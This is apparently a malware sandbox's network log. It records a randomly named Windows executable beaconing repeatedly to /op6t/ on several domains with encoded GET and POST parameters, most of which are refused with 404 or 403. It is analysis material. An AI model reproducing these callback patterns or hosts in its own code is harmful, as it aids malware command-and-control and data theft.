                                                                        May 22, 2024 17:33:26.063884974 CEST | 485 | OUT | GET /op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.ng-bo.online
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:26.427440882 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        25 | 192.168.11.30 | 49821 | 185.76.64.170 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:42.460525036 CEST | 744 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.curty.se
                                                                        Origin: http://www.curty.se
                                                                        Referer: http://www.curty.se/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:42.812310934 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:42 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        26 | 192.168.11.30 | 49822 | 185.76.64.170 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:45.336821079 CEST | 764 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.curty.se
                                                                        Origin: http://www.curty.se
                                                                        Referer: http://www.curty.se/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=7IW7hGPYZjfbSIEDyvcugnt4h1jwlPDJAjWWccnmL6ODyv0iDKMYxWzrqbwrwfx2fUG8Bm/FOpqrseU/bwrdGabnV1YDgo57F4qlKLms1O/IM/pDSfiHqHyAg6xs7eKQW8RRjj6hpm2KH5ZSrkGtqgxshDoVPiu07+aLq7UeSaNS24f3zL2KF8jIuNYHw8AaHODWmanlbVLJLrNDCFnYGwQ=
                                                                        May 22, 2024 17:33:45.683753014 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:45 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        27 | 192.168.11.30 | 49823 | 185.76.64.170 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:48.216077089 CEST | 1681 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.curty.se
                                                                        Origin: http://www.curty.se
                                                                        Referer: http://www.curty.se/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:48.568685055 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:48 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        28 | 192.168.11.30 | 49824 | 185.76.64.170 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:51.093523979 CEST | 481 | OUT | GET /op6t/?x2=wN2xY&nvddg=2K+bizHsAgvfK4Jo/uhNk3UulAHtk/DKCDOKU6rtdoeHnbYDCZc/1AXytKkQw+QkOVrLH0jtXL2IhsFkUUnXJZ7gVE9SlKcPHqW4H/CrkavSbMd4d5+KoUM= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.curty.se
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:51.445266962 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:51 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        29 | 192.168.11.30 | 49825 | 14.225.238.195 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:05.630665064 CEST | 759 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.beersekes.com
                                                                        Origin: http://www.beersekes.com
                                                                        Referer: http://www.beersekes.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=VeF3jG6ErSFFt+mZyCtoZTZJJvvRLJN+uI0JaYY4GQkwUdKZxyZQ88+l4MN5gGayhWWp1nVdTxddkiJUYal7yl9VjKgJxCgOZ2iM2Bm7e2GGyDnrFKpArTFpRI3TZDbpw0wry+BgKJXUeaXnEp/uZog9ejTq3VWpQM3g3BnZVbCUVjsfbYEiF3skBXKmxi+WeQ==
                                                                        May 22, 2024 17:34:06.137474060 CEST | 420 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:58 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 197
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        Vary: Accept-Encoding,User-Agent
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        30 | 192.168.11.30 | 49826 | 14.225.238.195 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:08.664446115 CEST | 779 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.beersekes.com
                                                                        Origin: http://www.beersekes.com
                                                                        Referer: http://www.beersekes.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=VeF3jG6ErSFFve2Z0l5oRTZIFPvRSZM3uIIJaZt/BjQwU4uZwwhQ98+lwsNg9WbwhWKf1jVdTw5dkgBUYp90xV9buqgL/igOZ2iM2Bjce2eGyzXrKIRDjzFmWI3TTjbtw0wJy81KKLvUefznE4/tC4g7ajSG5VelJdnwwx/+SKSYQ0dFGbwgWXQJdWnOzg/NDTCjuSqPHH6xoNtUa4KG8ig=
                                                                        May 22, 2024 17:34:09.170407057 CEST | 420 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:34:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 197
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        Vary: Accept-Encoding,User-Agent
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        31 | 192.168.11.30 | 49827 | 14.225.238.195 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:11.685544014 CEST | 1696 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.beersekes.com
                                                                        Origin: http://www.beersekes.com
                                                                        Referer: http://www.beersekes.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:34:12.180838108 CEST | 420 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:34:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 197
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        Vary: Accept-Encoding,User-Agent
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        32 | 192.168.11.30 | 49828 | 14.225.238.195 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:14.708139896 CEST | 486 | OUT | GET /op6t/?x2=wN2xY&nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.beersekes.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:34:15.209423065 CEST | 854 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:34:07 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Accept-Ranges: bytes
                                                                        Vary: Accept-Encoding,User-Agent
                                                                        Data Ascii: 26a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /op6t/?x2=wN2xY&amp;nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4= was not found on this server.<HR><I>www.beersekes.com</I></BODY></HTML>
                                                                        May 22, 2024 17:34:15.209541082 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        33 | 192.168.11.30 | 49829 | 91.195.240.123 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:31.825253010 CEST | 481 | OUT | GET /op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.l7aeh.us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:34:32.149307013 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                        content-length: 93
                                                                        cache-control: no-cache
                                                                        content-type: text/html
                                                                        connection: close
                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        34 | 192.168.11.30 | 49830 | 139.162.5.234 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:37.539385080 CEST | 771 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=z4yy+rh/POA0h0IHcWGt/x0BHIW/+T4TkYb2MeNbMyQt6D8PzxWgY6m6M/HLaaQBBbfyPaRHXcAdIq7qeD7ybTi/RRph7BJJ8IWKflR5QVcYnwOM2KbhjmvjyZsoG1xELPNlZsSy74N5WvmcJd4Mu+DXwi91prnycH4DrUk/vslm/BANb+Ee34RyR0QsSqX2FQ==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        35 | 192.168.11.30 | 49831 | 139.162.5.234 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:40.434447050 CEST | 791 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=z4yy+rh/POA0nlYHfxytuR0AZ4W/0z5UkYn2MfJ1MBkt6mAPhj+gf6m6ZPHKHKQeBbDAPatHXcUdIoTqfy7xaDi9ZxpjjhJJ8IWKfl0uQRIYnA+M2v23pGvgipsoC1xALPNDZpz67715WtucIM4Pl+DR0i9m6+S1H0FwgD4hiNdz+WxXG9wckYtfN19EQoWtYb47UCwrRXBzrWqAJ01jocY=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        36 | 192.168.11.30 | 49832 | 139.162.5.234 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:43.327738047 CEST | 1708 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        37 | 192.168.11.30 | 49833 | 139.162.5.234 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:34:46.221949100 CEST | 490 | OUT | GET /op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.tycent520test.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:34:48.585594893 CEST | 562 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:34:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding, Cookie
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://tycent520test.com/op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Data Raw: 36 0d 0a ef bb bf ef bb bf 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 60


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        38 | 192.168.11.30 | 49834 | 34.149.87.45 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:02.013325930 CEST | 786 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgoqLvP4248fGlow1lwzb3PamZJjVTmYhSUGJynMiUh6iWqRywq37Oh6py0gfiPwtggiDbNjozi9OUPhaq12NtdOC8dATI9QrD8U5EB+WoFOZCiRb0CyBQYlCrhZwy9FjfLM2wCY89QBI5yKNtlX/o9PQiDo/LVfk3BXpM8v7eaa1mhCdaZjIkIg==
                                                                        May 22, 2024 17:35:02.228631973 CEST | 1078 | IN | HTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716392102.1269038556672615301
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:35:02 GMT
                                                                        X-Served-By: cache-bfi-krnt7300112-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yx
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        39 | 192.168.11.30 | 49835 | 34.149.87.45 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:04.716804028 CEST | 806 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgpKbvOZ247/GmnQ1l+TbzPaqZJm0OmrVSVkRygOaUg6iWhxy1u37/h6160kXiPwpggizbNww8jtOWaRa0x2NtdOC8dAHu9QTD9lpEO7ira+ZFjRb0VCBcYlCFhbEU9DnfLNGwCp8iLRI//qMF2UKC9d5XNvDkTOogJgYWhsPcJ6JL9DwybhJ/VkGk81H8hzRUNxfMO7CBino=
                                                                        May 22, 2024 17:35:04.931837082 CEST | 1078 | IN | HTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716392104.8279035854453713443
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:35:04 GMT
                                                                        X-Served-By: cache-bfi-krnt7300093-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLjYvXQYrV/LrhbkNY01ADWAG/hKs8AeY1T4OIbgnD+yx
                                                                        Via: 1.1 google
